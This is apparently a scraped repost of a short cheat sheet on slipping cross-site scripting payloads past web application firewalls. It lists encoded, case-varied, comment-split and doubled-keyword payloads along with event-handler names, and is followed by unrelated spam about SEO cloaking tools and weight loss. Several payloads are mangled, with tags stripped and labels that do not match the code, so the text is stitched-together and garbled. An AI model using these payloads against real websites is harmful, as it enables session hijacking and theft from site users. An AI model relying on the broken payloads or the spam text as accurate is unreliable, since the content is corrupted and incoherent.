Cross Site Scripting (Cross Site Scripting, XSS) is a Web application attack in the data output to the page when there is a problem, leading to an attacker can be constructed malicious data displayed in the page vulnerability. Because the cross-site scripting attacks are to the page content to write a malicious script or HTML code, so cross-site scripting vulnerability is also known as HTML injection vulnerability.
How to bypass WAF:
Encoding bypass
Hex encode: alert(‘123’)jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-
magic_quotes_gpc bypass: String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)
close tag:
“>alert(/123/)
alert(1)
Case insensitive: alert(‘123’)
use other tag: XSS
<img a=”
“onsubmit=javascript:alert(1)%20name=”a
use comment: %0aalert(1);
/**/
%00
Two-letter bypass:
alalertert(123)
Other events bypassonload
onclick
onerror
prompt
confirm
onmousemove
The post Cross site scripting (XSS) :Some techniques to bypass WAF appeared first on Penetration Testing in Linux. http://ift.tt/2pm5VF1 http://ift.tt/2aM8QhC
Julio Della Flora 
He was the co-founder and principal of GmbH (Belgium), an organization specializing in webmaster software growth, industrial-energy cloaking and a wide range
of upmarket search engine optimization instruments and
providers, pioneering amongst other things such benchmark merchandise because the world’s most complete database of verified search engine spiders, fully automated IP supply purposes, link constructing community administration software and
automated personalized content material creation.
Porque você conquiste um perder peso verdadeiramente definitivo. http://www.icesi.edu.co/revistas/index.php/sistemas_telematica/comment/view/1195/0/5736